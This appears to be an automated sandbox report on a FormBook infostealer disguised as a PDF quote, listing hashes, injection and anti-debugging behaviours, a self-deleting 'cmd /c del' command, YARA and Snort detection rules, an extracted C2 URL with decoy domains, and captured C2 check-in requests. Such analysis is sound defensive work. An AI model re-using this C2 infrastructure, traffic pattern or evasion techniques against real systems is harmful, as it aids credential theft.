
Analysis Report RFQ_AP65425652_032421 isu-isu,pdf.exe

Overview

General Information

Sample Name: RFQ_AP65425652_032421 isu-isu,pdf.exe
Analysis ID: 383968
MD5: 98f9ea244308bb5969ea3c302c32efcd
SHA1: 82a913894418af7834d23bc543eb286230d4edf4
SHA256: cd292d4cdb5ff8f2de087a09de2a152722d910f1df7ce7b65e6480be9ae77fdf
Tags: exe, Formbook
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • RFQ_AP65425652_032421 isu-isu,pdf.exe (PID: 6788 cmdline: 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' MD5: 98F9EA244308BB5969EA3C302C32EFCD)
    • RFQ_AP65425652_032421 isu-isu,pdf.exe (PID: 6848 cmdline: 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' MD5: 98F9EA244308BB5969EA3C302C32EFCD)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 5128 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6316 cmdline: /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.luegomusic.com/pe0r/"], "decoy": ["quickeasybites.com", "idilecup.com", "atelierdusalon.com", "tigerking-safe.com", "goinyourstrength.com", "ssfgasia.com", "halmanseger.com", "hpcovn.com", "thegodfatherricedealer.com", "hzmsbg.com", "trickswithwix.com", "rbvctiu.com", "spystoredevices.com", "monlexiem.com", "apt-forward.com", "medsez.cloud", "nanantz.com", "kf350.com", "ztvwgqjya.com", "countingeverything.com", "motion-mill-tv.com", "mex33.info", "desertfoxindustries.com", "welchmanlongbow.com", "beachnovotel.com", "basicchan.com", "boekhoudingwetteren.com", "pierresplayhouse.com", "xitiefilm.com", "betterskindays.com", "hdeamutfak.com", "sqjqw4.com", "coloradocouponclub.com", "leadershipcodes.com", "simplysouthdisinfecting.net", "lideresdeimmunocal.com", "tipsaglik.com", "greaterluxuryrehab.info", "tennesseewheelrepair.com", "5150shoshone.com", "slot-782.com", "cubitia.net", "fudweisj.icu", "forguyshere.com", "connect-alert-status.network", "hannahkaylewis.com", "soarcredits.com", "queensindustrial.com", "kudzuentertains.com", "maconhemorrhoidcenter.com", "1364kensington.com", "prestamosa.com", "lifeisgoingwells.com", "cloverunner.com", "4608capaydrive.com", "neomily.xyz", "blushingdevil.com", "essentials-trading.com", "theinfoinsider.com", "heftylefties.com", "zea-px16z.net", "thecapitalhut.com", "rootedwithlovejax.com", "nesreenibrahimmd.com"]}

Yara Overview

Memory Dumps

Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp
  • Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  • Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  • Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp
  • Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  • Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack
  • Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  • Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  • Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
    • 0x158a9:$sqlite3step: 68 34 1C 7B E1
    • 0x159bc:$sqlite3step: 68 34 1C 7B E1
    • 0x158d8:$sqlite3text: 68 38 2A 90 C5
    • 0x159fd:$sqlite3text: 68 38 2A 90 C5
    • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack
  • Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  • Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Signature Overview


          AV Detection:

Found malware configuration
Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll, ReversingLabs: Detection: 22%
Multi AV Scanner detection for submitted file
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, Virustotal: Detection: 35%
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, ReversingLabs: Detection: 41%
Yara detected FormBook
Source: Yara match, File source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, Joe Sandbox ML: detected
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.control.exe.4ca7960.4.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.control.exe.a0a460.0.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscui.pdbUGP, source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP, source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.646395751.000000001EF20000.00000004.00000001.sdmp, RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.691829468.0000000000ABF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
Source: Binary string: control.pdb, source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: RFQ_AP65425652_032421 isu-isu,pdf.exe, control.exe
Source: Binary string: control.pdbUGP, source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb, source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe, Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe, Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe, Code function: 0_2_004026BC FindFirstFileA,

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.luegomusic.com/pe0r/
Source: global traffic, HTTP traffic detected: GET /pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 HTTP/1.1; Host: www.1364kensington.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, no printable text)
Source: global traffic, HTTP traffic detected: GET /pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 HTTP/1.1; Host: www.luegomusic.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, no printable text)
Source: global traffic, HTTP traffic detected: GET /pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 HTTP/1.1; Host: www.kf350.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, no printable text)
Source: global traffic, HTTP traffic detected: GET /pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 HTTP/1.1; Host: www.pierresplayhouse.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, no printable text)
Source: global traffic, HTTP traffic detected: GET /pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 HTTP/1.1; Host: www.thecapitalhut.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, no printable text)
Source: global traffic, HTTP traffic detected: GET /pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 HTTP/1.1; Host: www.ssfgasia.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, no printable text)
Source: global traffic, HTTP traffic detected: GET /pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 HTTP/1.1; Host: www.desertfoxindustries.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, no printable text)
Source: global traffic, HTTP traffic detected: GET /pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 HTTP/1.1; Host: www.tennesseewheelrepair.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, no printable text)
Source: global traffic, HTTP traffic detected: GET /pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 HTTP/1.1; Host: www.rootedwithlovejax.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (seven null bytes, no printable text)
Source: Joe Sandbox View, IP Address: 199.59.242.153
Source: Joe Sandbox View, ASN Name: BODIS-NJUS
Source: Joe Sandbox View, ASN Name: BIZLAND-SDUS
Source: Joe Sandbox View, ASN Name: ASN-QUADRANET-GLOBALUS
Source: unknown, DNS traffic detected: queries for: www.1364kensington.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Thu, 08 Apr 2021 11:22:07 GMT; Content-Type: text/html; Content-Length: 867; Connection: close; Server: Apache/2; Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT; Accept-Ranges: bytes; Accept-Ranges: bytes; Age: 0; response body (the report's raw hex dump, decoded to ASCII in full; the report's own ASCII column was truncated at "#ad_frame{ hei"):
    <!DOCTYPE HTML>
    <html>

        <head>
            <title>404 Error - Page Not Found</title>
            <style>
                #ad_frame{ height:800px; width:100%; }
                body{ margin:0; border: 0; padding: 0; }
            </style>
            <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
            <script type="text/javascript" language="JavaScript">
                var url = 'http://www.searchvity.com/?dn='
                    + document.domain + '&pid=9POL6F2H4';

                $(document).ready(function() {
                    $('#ad_frame').attr('src', url);
                });
            </script>
        </head>
        <body>
            <iframe id="ad_frame" src="http://www.searchvity.com/"
                frameborder="0" scrolling="no">

                <!-- browser does not support iframe's -->

            </iframe>
        </body>

    </html>
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp, String found in binary or memory: http://business.google.com/
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp, String found in binary or memory: http://business.google.com/website/rooted-with-love/pe0r/
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp, String found in binary or memory: http://business.google.com/website/rooted-with-love/pe0r/&quot;
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.660312730.0000000002B50000.00000002.00000001.sdmp, String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp, String found in binary or memory: https://ads.google.com/localservices
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp, String found in binary or memory: https://business.google.com
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp, String found in binary or memory: https://lh5.googleusercontent.com/tnT1qBMzmyLgRDNYg3gq78quEpuZVERk849E090SPkl3uZ90NtOdF0DdK28eDthwrR
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp, String found in binary or memory: https://rootedwithlovejax.com
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp, String found in binary or memory: https://schema.org/LocalBusiness
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp, String found in binary or memory: https://workspace.google.com
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp, String found in binary or memory: https://www.google.com/maps/dir//Rooted
Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp, String found in binary or memory: https://www.gstatic.com/_/mss/boq-geo/_/js/k=boq-geo.GeoMerchantPrestoSiteUi.en_US.H3HiHVucosI.es5.O
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe, Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
